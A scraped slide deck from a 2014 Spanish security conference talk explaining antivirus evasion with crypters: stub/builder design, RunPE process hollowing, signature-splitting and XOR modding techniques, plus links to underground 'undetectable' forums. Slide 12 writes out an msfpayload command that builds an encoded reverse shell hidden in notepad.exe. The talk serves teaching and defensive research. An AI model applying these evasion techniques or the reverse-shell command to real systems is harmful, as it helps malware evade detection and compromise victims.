Ramón Pinuaga - Authenticode para malotes [rooted2017]Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]RootedCON
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingJaime Andrés Bello Vieda
 
Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)Mackaber Witckin
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Websec México, S.C.
 
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]RootedCON
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)TR Hirecom
 
Fernando Perera - Empaquetado para Regalo [rootedvlc2019]
Fernando Perera - Empaquetado para Regalo [rootedvlc2019]Fernando Perera - Empaquetado para Regalo [rootedvlc2019]
Fernando Perera - Empaquetado para Regalo [rootedvlc2019]RootedCON
 
WordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las BackdoorsWordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las BackdoorsNestor Angulo de Ugarte
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...VOIP2DAY
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0wcuestas
 

Similar a Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar (20)

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerra
 
Tecnicas avanzadas de ocultamiento de malware
Tecnicas avanzadas de ocultamiento de malwareTecnicas avanzadas de ocultamiento de malware
Tecnicas avanzadas de ocultamiento de malware
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackHack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
 
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
 
fuzzing.pdf
fuzzing.pdffuzzing.pdf
fuzzing.pdf
 
Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentesting
 
Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
 
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
 
Fernando Perera - Empaquetado para Regalo [rootedvlc2019]
Fernando Perera - Empaquetado para Regalo [rootedvlc2019]Fernando Perera - Empaquetado para Regalo [rootedvlc2019]
Fernando Perera - Empaquetado para Regalo [rootedvlc2019]
 
Nuevas modalidades de fraude atm
Nuevas modalidades de fraude atmNuevas modalidades de fraude atm
Nuevas modalidades de fraude atm
 
WordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las BackdoorsWordCamp Madrid CSI: El caso de las Backdoors
WordCamp Madrid CSI: El caso de las Backdoors
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 

Último

Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21mariacbr99
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanamcerpam
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosJhonJairoRodriguezCe
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxJorgeParada26
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...JohnRamos830530
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIhmpuellon
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.FlorenciaCattelani
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxFederico Castellari
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativanicho110
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estossgonzalezp1
 

Último (10)

Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos Basicos
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 

Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar

  • 1. Evasión de Anti-Virus: Uso de Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
  • 2. Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Ingeniero superior y Máster en seguridad de la información Socio fundador de INCIDE: Expertos en prueba electrónica Forensics / Periciales Respuesta a incidentes Consultoría/Auditoría de Seguridad ! ncd:~ apasamar$ rm apasamar.cv
  • 3. de qué va esto... • Introducción • AV’s como funcionan • Tipos de malware y detección AV’s • Medidas de evasión • Auto-cifrado, Polimorfismo, Ofuscación, Compresión • Crypters • tipos y funcionamiento • stub • stub FUD • técnicas Modding • Recursos
  • 4. introducción • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
  • 5. introducción • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
  • 8. AV’s howto • Los AntiVirus escanean binarios EN DISCO • NO analizan la memoria, sino los binarios en disco que arrancan procesos • Buscan firmas: cadenas binarias (BBDD) • Buscan elementos/técnicas maliciosas (Heurística):APIS, funciones, XOR, etc • Sandbox (ejecución parcial): búsqueda de técnicas de descifrado, etc
  • 10. AV’s howto • Proceso análisis de los AV’s: Ataques
  • 11. AV’s howto • Recomendado: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin
  • 12. AV’s howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
  • 13. tipos de malware y detección AV’s • Programas espía comerciales: (white list, firmados) • e-blaster • 007 • perfect keylogger
  • 14. • Malware recién creado: • detección baja (sin firmas) • posible detección heurística tipos de malware y detección AV’s
  • 15. • Malware existente: (muy conocidos, firmas y heurística) • troyanos • downloaders • stealers • reverse shells • ... tipos de malware y detección AV’s
  • 16. ¿cómo se puede indetectar el malware ya detectado ? • C r y p t e r s: • Software que permite cifrar CUALQUIER MALWARE para hacerlo indetectable a los antivirus. • La rutina de descifrado tiene que poder ejecutarse (no se cifra)
  • 18. builder / stub • Builder: • Encargado de crear el ejecutable compuesto por el STUB y el MALWARE CIFRADO • Stub: • Encargado de descifrar el MALWARE CIFRADO y ejecutarlo
  • 19. ! ! ! ! ! ! ! ! ! CRYPTER + STUB STUB MALWARE DETECTADO MALWARE CIFRADO STUB CRYPTER (Builder) XOR, RC4, ... exe dll recurso builder / stub
  • 20. STUB MALWARE CIFRADO STUB MALWARE CIFRADOKEY Separador Separador También se puede usar un recurso builder / stub
  • 21. • Tipos de crypters: • ScanTime • RunTime builder / stub
  • 22. • ScanTime STUB MALWARE CIFRADO MALWARE DETECTADO DISCO AV stub
  • 23. • RunTime STUB MALWARE CIFRADO DISCO RAM MALWAREDETECTADO AV stub
  • 24. • Componentes STUB: • Rutina Decrypt • RunPe ! stub
  • 25. RunPE o Dynamic Forking CreateProcess PROCESO 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP I +8 PROCESO 2 ReadFile WriteProcessMemoryEP 2 BaseAddress 2 SetThreadContextResumeThread
  • 26. FUD • Objetivo: Stub FUD (Full UnDetectable) • Indetección desde Fuente (Source) • Indetección desde Binario • ¿Cómo? • MODDING
  • 27. modding source • A mano o con ofuscadores: • Reemplazar funciones (SPLIT,..) • Reemplazar y/o ofuscar funciones/strings/variables y Cifrar con rot13 o Hex • Cifrados: RC4 y XOR quemadas • Alternativas:TEA, DES, etc • RunPE alternativos • APIs Falsas • TLB (Tab Library File) • Trash code
  • 28. modding binario • Indetección desde Binario: • Se utilizan diferentes técnicas como: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR y variantes • Tips
  • 29. • Se modea el STUB, el BUILDER no es parte del malware in the wild • Se buscan las FIRMAS o puntos de detección • Firmas sencillas • Firmas Múltiples • Heurística modding binario
  • 30. AV’s howto • Recomendado: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team
  • 31. • ¿Rutina CIFRADO/DESCIFRADO dentro del STUB? stub.exe EP Firmas stub.exe OLD EP Firmas NEW EP CIFRADO Descifrado modding binario
  • 32. • SCAN DEL STUB ORIGINAL modding binario
  • 33. • RUTINA DE CIFRADO • NEW EP • INSERTAR RUTINA • .text SECTION • desde 1050 • hasta import table modding binario
  • 34. • RUTINA CIFRADO EN NEW EP modding binario
  • 35. • RUTINA DESCIFRADOY EJECUCIÓN EN NEW EP modding binario
  • 36. • SCAN DEL STUB MODIFICADO modding binario 16 AV’s KO
  • 37. • TÉCNICAS: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR y variantes • Tips modding binario
  • 38. • Técnica DSplit: Cabecera Cuerpo EXE Cabecera Cuerpo EXE 1000 bytes Cabecera Cuerpo EXE 2000 bytes Cabecera Cuerpo EXE 3000 bytes Cabecera Cuerpo EXE ··· Nx1000 bytes modding binario
  • 39. • Técnica AvFucker: Cabecera Cuerpo EXE Cuerpo EXECabecera 0000000000 1000 bytes Cabecera Cuerpo EXE0000000000 1000 bytes Cabecera Cuerpo EXE0000000000 1000 bytes Cabecera Cuerpo EXE ··· 0000000000 1000 bytes modding binario
  • 40. • Técnica RIT • localizar firma • si son instrucciones partir flujo • saltar a otro punto (hueco) • finalizar las instrucciones • retornar al punto posterior ! modding binario
  • 41. • Técnica XOR • localizar firma/s • aplicar XOR con un valor p.e. 22 • Modificar EP o saltar a un hueco • aplicar XOR 22 • retornar al punto posterior ! modding binario
  • 42. Detectado (EP): XOR de los bytes detectados: Nuevo EP ( Instruccione XOR reverso): modding binario
  • 43. otras técnicas • Añadir APIs Falsas • Edición Hexadecimal de cadenas • Mover/cambiar direcciones de llamadas a las funciones • Cambiar llamadas por nombre/offeset • Introducir en STUB la función de la DLL detectada !
  • 44. recursos • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
  • 45. Avda. Diagonal, 640 6ª Planta 08017 Barcelona info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 ¿ P R E G U N T A S ?